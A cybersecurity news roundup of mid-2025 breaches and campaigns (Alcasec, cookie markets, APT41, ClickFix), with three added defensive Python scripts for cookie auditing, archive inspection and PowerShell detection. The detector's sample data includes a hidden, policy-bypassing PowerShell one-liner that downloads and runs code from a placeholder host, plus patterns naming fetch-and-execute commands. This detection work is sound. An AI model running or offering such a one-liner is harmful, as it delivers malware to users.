Also, Stolen Cookies for Sale, LexisNexis Breach and an FBI Warning
Anviksha More (AnvikshaMore)
May 29, 2025

Every week, Information Security Media Group rounds up cybersecurity incidents and breaches around the world. This week, José Luis Huertas “Alcasec” back in a Spanish jail, billions of stolen cookies for sale and Chinese hackers used Google Calendar. LexisNexis and Adidas had breaches, and the FBI warned law firms about vishing. ClickFix scammers used fake Google Meet pages and the Victoria’s Secret website went offline. Microsoft wants to control all the software updates on Windows computers.
Hacker Alcasec in the Jailhouse Again, Along With Former Spanish Government Official
Spanish hacker José Luis Huertas is again in jail along with a former high-level official from the Ministry of Interior after authorities accused them of mounting a private intelligence company fueled by stolen data.
A judge on Thursday ordered Huertas into provisional detention, along with Francisco Martínez, a conservative politician who was the secretary of state security between 2013 and 2016, reported public broadcaster Radiotelevisión Española.
Huertas, aka “Alcasec,” gained fame after authorities in 2023 called him a “severe national security risk” following his October 2022 hacking of a government file transfer system and the theft of sensitive data belonging to more than half a million taxpayers. The incident was a capstone to years spent cultivating a teenaged Robin Hood reputation built on stunts such as distributing stolen HBO accounts online and hacking the Burger King ordering system to offer free food (see: Spanish Police Arrest ‘Dangerous’ Teenage Hacker).
Spanish police arrested Huertas and Martínez and two other suspects on Tuesday, accusing them of criminal conspiracy, money laundering and exposure of secrets. El País reported authorities began investigating after detecting in 2024 a series of systematic cyberattacks against government agencies. The national competition agency reported a “massive exfiltration of personal data” including names connected to mobile phones, the newspaper reported.
The investigation, dubbed “Operation Borraska,” revealed a cloud platform for storing, indexing and commercializing data pertaining to individuals and corporations. That allowed the conspiracy to create personal profiles and cross-check information in real time, police said. Members allegedly hid their real work by mounting a technology services company. Conspiracy members had clearly articulated responsibilities, such as system administration, cryptocurrency management and business development, police also said.
Authorities said the conspiracy had access to data linked to millions of Spanish citizens, including school records, civil registries, telephone accounts and electricity consumption. Huertas told Madrid state judge María Tardón that he collected information exposed to the open internet through artificial intelligence.
Prosecutors are already seeking a three-year prison sentence for Huertas for his government file transfer hack. In a sit-down interview in March 2024, Huertas told online newspaper El Confidencial that his brush with the justice system made him a reformed man and that he was shifting his energies into legitimate endeavors (see: Breach Roundup: Catching Up With Alcasec, Spain’s Most Dangerous Hacker).
Billions and Billions of Stolen Cookies
Cybersecurity experts are raising alarms over the availability of stolen browser cookies on the dark web and Telegram marketplaces. NordVPN found that more than 93.7 billion cookies are currently for sale, with up to 9% of them still active and exploitable. Cookies can grant cybercriminals unauthorized access to personal accounts without the need for passwords.
A majority of cookies available for illicit purchase are used for user identification and targeted advertising. But a significant portion – around 1.2 billion – are session cookies, potentially allowing attackers to impersonate users, bypass multi-factor authentication and access email, banking and corporate systems.
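The reason a stolen session cookie is dangerous is that it is the bearer credential the server trusts after login, so the defensive levers are the attributes set on that cookie and how long the server keeps the session valid. The following audit script is an added example, not code from NordVPN or from the article; it parses Set-Cookie headers, guesses which cookies carry a session by name (the name hints and the 24-hour lifetime threshold are this example's own assumptions) and reports missing Secure, HttpOnly and SameSite attributes plus session cookies that would stay valid for days if copied out of a browser. The three headers are constructed samples, not captured from any real site.

```python
import re
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Name fragments that suggest a cookie carries an authenticated session (assumption).
SESSION_NAME_HINTS = ("sess", "auth", "token", "sid", "login")
# Policy threshold for how long a session-bearing cookie may persist (assumption).
MAX_SESSION_LIFETIME_SECONDS = 24 * 3600

# Constructed sample headers, not from any real service.
SAMPLE_HEADERS = [
    "sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax; Max-Age=900",
    "auth_token=xyz789; Path=/; Expires=Wed, 01 Jan 2031 00:00:00 GMT",
    "ad_pref=blue; Path=/; Max-Age=31536000",
]


def parse_set_cookie(header):
    """Split a Set-Cookie header into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def cookie_lifetime_seconds(attrs, now):
    """Seconds the cookie persists on disk; 0 means browser-session only; None if unparseable."""
    if "max-age" in attrs:
        try:
            return int(attrs["max-age"])
        except ValueError:
            return None
    if "expires" in attrs:
        try:
            expires = parsedate_to_datetime(attrs["expires"])
        except (TypeError, ValueError):
            return None
        if expires.tzinfo is None:
            expires = expires.replace(tzinfo=timezone.utc)
        return int((expires - now).total_seconds())
    return 0


def audit_set_cookie(header, now=None):
    """Return (name, looks_like_session, findings) for one Set-Cookie header."""
    now = now or datetime.now(timezone.utc)
    name, _, attrs = parse_set_cookie(header)
    findings = []
    looks_like_session = any(hint in name.lower() for hint in SESSION_NAME_HINTS)
    if "secure" not in attrs:
        findings.append("missing Secure (sent over plain HTTP)")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly (readable by page scripts)")
    if "samesite" not in attrs or attrs["samesite"].lower() == "none":
        findings.append("SameSite absent or None (sent on cross-site requests)")
    lifetime = cookie_lifetime_seconds(attrs, now)
    if looks_like_session and lifetime is not None and lifetime > MAX_SESSION_LIFETIME_SECONDS:
        findings.append(f"session-bearing cookie persists about {lifetime // 3600} hours")
    return name, looks_like_session, findings


def audit_all(headers, now=None):
    """Audit a list of Set-Cookie headers; returns {cookie name: findings}."""
    report = {}
    for header in headers:
        name, _, findings = audit_set_cookie(header, now)
        report[name] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit_all(SAMPLE_HEADERS).items():
        print(name, "->", findings or "ok")
```

Cookie attributes limit theft through the page (scripts, cross-site requests, plaintext transport); they do not stop an infostealer that reads the browser's cookie store directly. What shrinks that exposure is the last check: a session cookie with a short lifetime, paired with server-side session expiry and revocation, is far less likely to be among the fraction still usable when it reaches a marketplace.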
APT41 Exploits Government Site to Deliver Stealthy Malware via Google Calendar
Google’s Threat Intelligence Group uncovered a cyber-espionage campaign by the Chinese state-sponsored actor it tracks as APT41. Google late last year discovered that APT41 compromised a government website to distribute a malware strain dubbed “Toughprogress,” which uses Google Calendar for command-and-control communications.
The attack begins with spear-phishing emails containing links to a zip archive hosted on the compromised site. This archive includes a deceptive LNK file disguised as a PDF and a folder of images. On execution, the LNK file deletes itself and displays a decoy PDF, while simultaneously initiating a multi-stage malware deployment. The two files masquerading as images are an encrypted payload and its corresponding decryption DLL.
Toughprogress comprises three modules, each designed for stealth and evasion, operating entirely in memory to avoid detection. The malware communicates with its operators via Google Calendar, blending malicious traffic with legitimate services.
APT41, also tracked as Barium, Earth Baku and Winnti, targets sectors including government, shipping, media, technology and automotive industries. Google said it responded to the campaign by deploying custom detection signatures, dismantling attacker infrastructure, and enhancing Safe Browsing protections.
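The delivery chain above turns on two masquerades that are cheap to check at a mail gateway or sandbox intake: a Windows shortcut carrying a decoy document extension, and files named as images whose contents are not images. The inspector below is an added example, not Google's detection logic or APT41 tooling; it builds a constructed archive in memory that mirrors the described layout (inert placeholder bytes, no real payload) and flags entries by comparing each name's extension against the file's leading bytes. The shortcut, JPEG, PNG, GIF and PE signatures are standard public format magic; the archive and its file names are this example's own invention.

```python
import io
import zipfile

# Shell Link (.lnk) header: HeaderSize 0x4C followed by the fixed LinkCLSID.
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")
# Leading bytes expected for common image extensions.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
PE_MAGIC = b"MZ"  # DOS stub header that opens every EXE/DLL


def build_sample_archive():
    """Constructed archive imitating the described layout; contents are inert filler."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Quarterly_Report.pdf.lnk", LNK_MAGIC + b"\x00" * 64)  # shortcut posing as a PDF
        zf.writestr("images/cover.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 32)  # plausible JPEG header
        zf.writestr("images/photo1.jpg", b"MZ" + b"\x90" * 62)  # PE file named as an image
        zf.writestr("images/photo2.jpg", bytes(range(256)))  # opaque blob named as an image
    return buf.getvalue()


def inspect_archive(data):
    """Return [(entry name, reason)] for entries whose name and content disagree."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(32)
            name = info.filename
            base = name.rsplit("/", 1)[-1].lower()
            suffixes = base.split(".")[1:]  # all extensions after the first dot
            ext = "." + suffixes[-1] if suffixes else ""
            if ext == ".lnk" or head.startswith(LNK_MAGIC):
                reason = "Windows shortcut (.lnk)"
                if len(suffixes) >= 2:
                    reason += f" with decoy extension .{suffixes[-2]}"
                findings.append((name, reason))
            elif ext in IMAGE_MAGIC:
                if head.startswith(PE_MAGIC):
                    findings.append((name, "PE executable/DLL claiming to be an image"))
                elif not head.startswith(IMAGE_MAGIC[ext]):
                    findings.append((name, "image extension but no matching file signature"))
    return findings


if __name__ == "__main__":
    for entry, reason in inspect_archive(build_sample_archive()):
        print(f"{entry}: {reason}")
```

The signature check catches the decryption DLL because a PE file cannot hide its MZ header without also failing to load; the encrypted payload has no recognisable header at all, which is itself the signal. Neither check needs to execute anything, so the same logic fits in a quarantine step before a user ever sees the archive.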
LexisNexis Risk Solutions Breach Exposes Data of 364,000 People
Multinational data broker LexisNexis Risk Solutions said a data breach exposed personal information of over 364,000 individuals. The breach, traced back to GitHub – a platform the company uses for software development – was reported by an unknown third party on April 1.
An internal investigation supported by a forensics firm revealed that hackers accessed software artifacts and sensitive data, including names, contact details, Social Security numbers, driver’s license numbers and birthdates.
Regulatory filings in Maine, Vermont and South Carolina show the breach occurred on Christmas Day. LexisNexis is offering two years of identity protection to affected individuals.
Adidas Cops to Data Breach via Third-Party Provider
Athletic apparel and footwear maker Adidas disclosed a data breach involving customer information stolen from a third-party customer service provider. The exposed data “mainly consists” of contact details of individuals who reached out to the Adidas help desk, though no passwords or payment information were affected.
FBI Warns of Vishing Attacks on Law Firms
The FBI published a warning about an ongoing vishing campaign targeting legal firms by a threat actor known as Silent Ransom. Active since 2022, the group is known for extorting victims by stealing data rather than using ransomware.
The group uses social engineering tactics, including fake IT support calls and phishing emails, to trick victims into granting remote access to their systems. Once inside, attackers exfiltrate sensitive data and demand ransom for its return.
Phishing Scam Uses Fake Google Meet Pages
A ClickFix phishing campaign is exploiting fake Google Meet pages to trick users into executing malicious PowerShell commands, leading to infections with malware like AsyncRAT, StealC and Rhadamanthys.
The attack starts with phishing emails mimicking Google Meet invites. Victims are directed to fake meeting pages with deceptive domains such as meet.google.us-join.com. These pages simulate microphone permission errors and prompt users to click a “Try Fix” button, which silently copies a malicious PowerShell command to their clipboard.
Victims are then instructed to paste this command into PowerShell, triggering the download and execution of obfuscated scripts that load malware directly into memory. The attack uses decoy messages like “Verification complete!” while executing payloads that establish persistence, exfiltrate data and bypass browser security.
Advanced variants target Windows and macOS users. Attribution points to groups like TA571 and Slavic Nation Empire, with activity observed since March 2024.
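Because the victim types or pastes the command themselves, the process tree looks like an ordinary user opening PowerShell; what distinguishes it is the command line, which has to be hidden, policy-bypassing and self-downloading to work in one paste. The scorer below is an added example, not a vendor rule or anything published by the researchers cited above; it reads constructed Sysmon-style process-creation records as JSON lines (the three events, the placeholder `fix-page.invalid` URL and the indicator weights are this example's own assumptions) and raises an alert when enough of those traits appear together, with the parent being a user-facing shell such as explorer.exe adding weight.

```python
import json
import re

# Heuristic traits of a copy-and-paste PowerShell one-liner. Names and weights are
# this example's own choices, not taken from any published ruleset.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:ncodedcommand|nc|c)\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote_fetch": re.compile(
        r"\b(?:irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I),
    "url": re.compile(r"https?://[^\s'\"()]+", re.I),
}
# Parents that mean a human launched the shell (Run dialog, Start menu, terminal).
USER_LAUNCHED_PARENTS = {"explorer.exe", "windowsterminal.exe"}
ALERT_THRESHOLD = 3

# Constructed process-creation records, not real telemetry.
SAMPLE_EVENTS = [
    json.dumps({"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": "powershell.exe"}),  # user just opened a shell
    json.dumps({"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "ParentImage": r"C:\Program Files\ExampleVendor\agent.exe",
                "CommandLine": r'powershell.exe -ExecutionPolicy Bypass -File "C:\Program Files\ExampleVendor\maint.ps1"'}),
    json.dumps({"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": 'powershell.exe -w hidden -ep bypass -c "iex (irm http://fix-page.invalid/verify)"'}),
]


def score_event(event):
    """Score one process-creation record; returns matched traits, extracted URLs and score."""
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    matched = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    score = len(matched)
    # A suspicious one-liner launched from the desktop shell is the ClickFix shape.
    if parent in USER_LAUNCHED_PARENTS and matched:
        matched.append("user_launched_parent")
        score += 1
    return {"score": score, "matched": matched,
            "urls": INDICATORS["url"].findall(cmd), "parent": parent, "command": cmd}


def analyze_events(lines, threshold=ALERT_THRESHOLD):
    """Parse JSON-line events and return those scoring at or above the threshold."""
    alerts = []
    for line in lines:
        result = score_event(json.loads(line))
        if result["score"] >= threshold:
            alerts.append(result)
    return alerts


if __name__ == "__main__":
    for alert in analyze_events(SAMPLE_EVENTS):
        print(alert["score"], alert["matched"], alert["urls"])
```

The second sample shows why a single trait is not enough: management agents legitimately run scripts with an execution-policy override, so the threshold requires several traits together. Extracted URLs give the responder a blocklist candidate and a pivot to proxy logs, and the parent-process weighting can be extended with Run-dialog history or clipboard telemetry where the endpoint agent collects it.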
Victoria’s Secret Takes Website Offline Following Security Incident
Lingerie retailer Victoria’s Secret temporarily shut down its website after detecting a cybersecurity incident, the company said. The disruption affected customers attempting to access victoriassecret.com, who were met with a maintenance message.
Victoria’s Secret has not confirmed whether customer data was compromised but said it will notify affected individuals and authorities if necessary.
Microsoft Unveils Unified Platform for App, Driver, and System Updates
Microsoft wants to take over ensuring that everything on a Windows computer is updated through an orchestration platform built on the existing Windows Update infrastructure.
Currently in private preview, the platform allows developers and IT teams to register software. Once registered, Microsoft’s orchestrator will run a provided update scan tool to detect pending updates, manage downloads and schedule installations.
The platform handles update complexities such as restarts, failed update retries and user notifications, Microsoft said. The computing giant said the goal is to unify what has traditionally been a fragmented update experience and provide a centralized system for IT admins and users. The orchestration engine also integrates with native Windows Update dialogs and displays update history alongside system updates in Settings.
With reporting by Information Security Media Group’s David Perera in Northern Virginia